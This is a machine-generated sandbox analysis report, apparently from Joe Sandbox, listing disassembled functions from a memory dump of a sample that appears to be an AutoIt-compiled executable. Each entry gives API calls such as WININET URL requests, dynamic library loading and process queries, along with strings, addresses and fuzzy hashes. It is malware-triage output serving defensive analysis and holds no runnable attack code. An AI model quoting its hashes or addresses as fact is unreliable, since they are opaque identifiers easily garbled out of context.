Opcode Fuzzy Hash: 7408b628dc5f91bb7580007946d7c0196c7439e91563a262519ead96be0cfbdd
Instruction Fuzzy Hash: D1F05432241222ABD7211BD4FC48DEE7769FF94711F140425F6C3950A8DB7A9401DB50

Function 00FE1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00FFF4EA: std::exception::exception.LIBCMT ref: 00FFF51E
Part of subcall function 00FFF4EA: __CxxThrowException@8.LIBCMT ref: 00FFF533

__swprintf.LIBCMT ref: 00FE1EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FE1D49

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: b39b1e131dc5b28a26bd15f67f8e7d308ad50279474525b8f373cbc11d6126a1
Instruction ID: e7333afe0387fe8918f5e07730058adee0f58da96d31ec8ecf3ba23ee8549a63
Opcode Fuzzy Hash: b39b1e131dc5b28a26bd15f67f8e7d308ad50279474525b8f373cbc11d6126a1
Instruction Fuzzy Hash: 899198711083819FD764EF2ACC85C6FBBA8BF95700F00491DF986972A1EB74E904DB92

Function 0103AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0103B006
CharUpperBuffW.USER32(?,?), ref: 0103B115
VariantClear.OLEAUT32(?), ref: 0103B298

Part of subcall function 01029DC5: VariantInit.OLEAUT32(00000000), ref: 01029E05
Part of subcall function 01029DC5: VariantCopy.OLEAUT32(?,?), ref: 01029E0E
Part of subcall function 01029DC5: VariantClear.OLEAUT32(?), ref: 01029E1A

Strings

Incorrect Parameter format, xrefs: 0103B03E, 0103B20B
AUTOIT.ERROR, xrefs: 0103B11B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: b614074e4587913eec829dfa3571fc586a6a5c4f02b7b54ed39a8e4081ad0900
Instruction ID: 1c2bf909acf18401c5b10ad196edee6e8b1aeb522b93195a1b9b606e59d8a854
Opcode Fuzzy Hash: b614074e4587913eec829dfa3571fc586a6a5c4f02b7b54ed39a8e4081ad0900
Instruction Fuzzy Hash: BC916B306083419FCB10DF69C89499EBBE8BFC9704F04496DF99A9B361DB31E905CB52

Function 01025347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFC6F4: _wcscpy.LIBCMT ref: 00FFC717

_memset.LIBCMT ref: 01025438
GetMenuItemInfoW.USER32(?), ref: 01025467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01025513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0102553D

Strings

0, xrefs: 01025430

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 2ff1e6e4c98c714369e2771387191b5eadadcd3174124408bdf9fa5e99b6d3ec
Instruction ID: bfbf1abb88eae24613f75a7d7cf64410156e30ad9db85de1118cdfda634c7b58
Opcode Fuzzy Hash: 2ff1e6e4c98c714369e2771387191b5eadadcd3174124408bdf9fa5e99b6d3ec
Instruction Fuzzy Hash: 475100312083219BE3959E2CCC416FFBBE8AF85324F44066EF9D5D3190EB74C9448B9A

Function 01020213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 010202B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 010202C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01020344

Strings

DllGetClassObject, xrefs: 010202B7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: cfc936fe292b9155c715d217f252cc9cc231c69afb66c2f70441de8e6c72a247
Instruction ID: 3d0a5622572f092b212ba2e1a139c9d7e70e99c9ac974cbb57d9db61b1449cf5
Opcode Fuzzy Hash: cfc936fe292b9155c715d217f252cc9cc231c69afb66c2f70441de8e6c72a247
Instruction Fuzzy Hash: F3414CB1600314EFDB55CF54C8D4A9B7BB9EF48214B14C0A9F9899F20AD7B5D944CBA0

Function 01025007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01025075
GetMenuItemInfoW.USER32 ref: 01025091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 010250D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010A1708,00000000), ref: 01025120

Strings

0, xrefs: 0102506D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: cbb45a6b3848f3a75142135dcfb1fd351b3e4b97da7ed097095acb11d8019f05
Instruction ID: 1b2b9e401f88d65d5ef56c755b96a4a8af56d09670a71a7626bf6f0b42d9660a
Opcode Fuzzy Hash: cbb45a6b3848f3a75142135dcfb1fd351b3e4b97da7ed097095acb11d8019f05
Instruction Fuzzy Hash: 3F41B2712043119FD720DF28DC84BAABBE8AF89324F14465EF9D5972D1D734E900CB6A

Function 01040567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 01040587

Strings

cdecl, xrefs: 010405DE
stdcall, xrefs: 01040609
none, xrefs: 01040662
winapi, xrefs: 010405F8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 9940d15971ef31e8ce791ade98a4bf91d28c52ae718981baacddf4bc20ca4348
Instruction ID: cf9b2286bdc6f021e8fdd47636e1a153abda359987500292add096dc4662da12
Opcode Fuzzy Hash: 9940d15971ef31e8ce791ade98a4bf91d28c52ae718981baacddf4bc20ca4348
Instruction Fuzzy Hash: A131B27050021AAFCF00EF58CD919EEB3B4FF54314B108669F9A6A76D5DB75E906CB80

Function 0101B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0101B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0101B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0101B8D1

Strings

ListBox, xrefs: 0101B84D
ComboBox, xrefs: 0101B815

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: df7c2f10918f77e0181433648919e0cf12d0800424c857d47bb0a27cf190c6c1
Instruction ID: dd98afeacea8bb7d4e728650c84af7576b8406af0ae6b898accf4bcb1c99ce40
Opcode Fuzzy Hash: df7c2f10918f77e0181433648919e0cf12d0800424c857d47bb0a27cf190c6c1
Instruction Fuzzy Hash: 80212372A00108BFDB14ABA9CC86DFE77B8DF05B54B00412DF4A1A71E4DB7D490A9760

Function 010343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01034401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01034427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01034457
InternetCloseHandle.WININET(00000000), ref: 0103449E

Part of subcall function 01035052: GetLastError.KERNEL32(?,?,010343CC,00000000,00000000,00000001), ref: 01035067

Strings

, xrefs: 01034450

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 879509c118adc7d8c704970c93ce46ced6034091ef28a639e209ae2bd0bbf2a8
Instruction ID: 26a926b6302bb1850d7d336f58bb2be8e3c87fd4997751d70e6004ff9c37f475
Opcode Fuzzy Hash: 879509c118adc7d8c704970c93ce46ced6034091ef28a639e209ae2bd0bbf2a8
Instruction Fuzzy Hash: 4B2192B1600208BEE7619F94CC84EBFBAECFB89644F00842AF185DA140EB798D059771

Function 010490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FFD1BA
Part of subcall function 00FFD17C: GetStockObject.GDI32(00000011), ref: 00FFD1CE
Part of subcall function 00FFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FFD1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0104915C
LoadLibraryW.KERNEL32(?), ref: 01049163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01049178
DestroyWindow.USER32(?), ref: 01049180

Strings

SysAnimate32, xrefs: 01049137

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 9956f642d3c3aa53017a6268f385f0ae3c24610e63ddba25befea3814a30aa80
Instruction ID: b650d0a61ff229692efba12c5fc14ca378369181957d9c94d3b395833e119693
Opcode Fuzzy Hash: 9956f642d3c3aa53017a6268f385f0ae3c24610e63ddba25befea3814a30aa80
Instruction Fuzzy Hash: E92180B1200205BBEF219E689CC5EBB37E9EF4D368F100678FA94961A1C7729C41A760

Function 01029568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 01029588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 010295B9
GetStdHandle.KERNEL32(0000000C), ref: 010295CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01029605

Strings

nul, xrefs: 01029600

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 84595427ba21d5efacde7109d25c599d32c247bf9a34136b13103bb5fc15a08e
Instruction ID: 335ddeb16878a531eed58f1c89ed709e4b26af7eb952b3c8460743eeb233b033
Opcode Fuzzy Hash: 84595427ba21d5efacde7109d25c599d32c247bf9a34136b13103bb5fc15a08e
Instruction Fuzzy Hash: 5B215E70700236EBEB209F69D804A9E7BE8AF59728F204A59FDE1D72D0D771D950CB60

Function 01029634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01029653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01029683
GetStdHandle.KERNEL32(000000F6), ref: 01029694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010296CE

Strings

nul, xrefs: 010296C9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 0146e3fc1c3a73148bb2f1952c4e2ba26b693f67bdc53fdd62145e2049fb0d23
Instruction ID: 87e8e6d1ca3e141979fc6065a5759133e5d24aa421b670dde0474c7778f8d470
Opcode Fuzzy Hash: 0146e3fc1c3a73148bb2f1952c4e2ba26b693f67bdc53fdd62145e2049fb0d23
Instruction Fuzzy Hash: 812171716002369BDB309F699848E9E77ECAF59738F200A59FDE1E72D0D7759440CB60

Function 0102DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0102DB5E
__swprintf.LIBCMT ref: 0102DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0107DC00), ref: 0102DBB5

Strings

%lu, xrefs: 0102DB71

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 818fb2164c4ffa423896d4eea97c2eafba5b5456f0a9802790a067bca3d439b3
Instruction ID: 67a14aa1f471a810c92e0c2a31ae47cfc2f1ec07cb7d9f3fadb3464172d19a28
Opcode Fuzzy Hash: 818fb2164c4ffa423896d4eea97c2eafba5b5456f0a9802790a067bca3d439b3
Instruction Fuzzy Hash: B3217F35A00149AFDB10EFA5CD95DEEBBB8EF88700B004069F649EB251DB75EA01DB61

Function 0101C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0101C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101C84A
Part of subcall function 0101C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0101C85D
Part of subcall function 0101C82D: GetCurrentThreadId.KERNEL32 ref: 0101C864
Part of subcall function 0101C82D: AttachThreadInput.USER32(00000000), ref: 0101C86B

GetFocus.USER32 ref: 0101CA05

Part of subcall function 0101C876: GetParent.USER32(?), ref: 0101C884

GetClassNameW.USER32(?,?,00000100), ref: 0101CA4E
EnumChildWindows.USER32(?,0101CAC4), ref: 0101CA76
__swprintf.LIBCMT ref: 0101CA90

Strings

%s%d, xrefs: 0101CA8A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 31c61ec92b85d3c14760987ca8ebab3e75104ba16ea2c544ef617e1d6d11ece3
Instruction ID: 631e7d5ee99b1577de2674de40746c97e4eff686e3e868d72f887bce88f110b6
Opcode Fuzzy Hash: 31c61ec92b85d3c14760987ca8ebab3e75104ba16ea2c544ef617e1d6d11ece3
Instruction Fuzzy Hash: 1311A2726402057BEB11BFA19DC5FED3768AF68B14F004066FE88AA049CB78D945DB71

Function 01041945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 010419F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 01041A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 01041B49
CloseHandle.KERNEL32(?), ref: 01041BBF

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 47129b792a152ede8ea33424ef06b129f8b6a7c423162e0c746d673e6bfc9995
Instruction ID: 9fc5e4487af0df3dce718131068672bff54c5c93a5746f04e2a771319851fc0e
Opcode Fuzzy Hash: 47129b792a152ede8ea33424ef06b129f8b6a7c423162e0c746d673e6bfc9995
Instruction Fuzzy Hash: D88160B4600214EBDF109F64CC86BADBBE5BF48720F048459FA45AF3D2D7B9E9418B90

Function 0104E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0104E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0104E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0104E248
GetWindowLongW.USER32(?,000000EC), ref: 0104E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0104E281

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: b5f29070f175c4ed3eddc046e0cc49752831ecf7965a94ba54e4ff9d127f3b50
Instruction ID: dc6f98a9e50533c0f0ccc110106ffd68b018a062942edb710f5237eaa25d8e25
Opcode Fuzzy Hash: b5f29070f175c4ed3eddc046e0cc49752831ecf7965a94ba54e4ff9d127f3b50
Instruction Fuzzy Hash: 456170B4A40204AFEB65CF58C8D4FEA7BFABF49300F0445A9F9D5972A1C779A940CB11

Function 01021C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01021CB4
VariantClear.OLEAUT32(00000013), ref: 01021D26
VariantClear.OLEAUT32(00000000), ref: 01021D81
VariantClear.OLEAUT32(?), ref: 01021DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01021E26

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 017310722088dccade9eaca6f06590c93e18240e63b36d3ceb9406334e4c6a45
Instruction ID: 55fd39ff9a5555481163bebe9fe7431c5c0a91addc939dc6158234650cc94b17
Opcode Fuzzy Hash: 017310722088dccade9eaca6f06590c93e18240e63b36d3ceb9406334e4c6a45
Instruction Fuzzy Hash: 71517AB5A00219EFDB10DF58C880AAAB7F8FF4C314B158559E999DB305E734EA11CFA0

Function 01040688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 010406EE
GetProcAddress.KERNEL32(00000000,?), ref: 0104077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0104079B
GetProcAddress.KERNEL32(00000000,?), ref: 010407E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 010407FB

Part of subcall function 00FFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0102A574,?,?,00000000,00000008), ref: 00FFE675
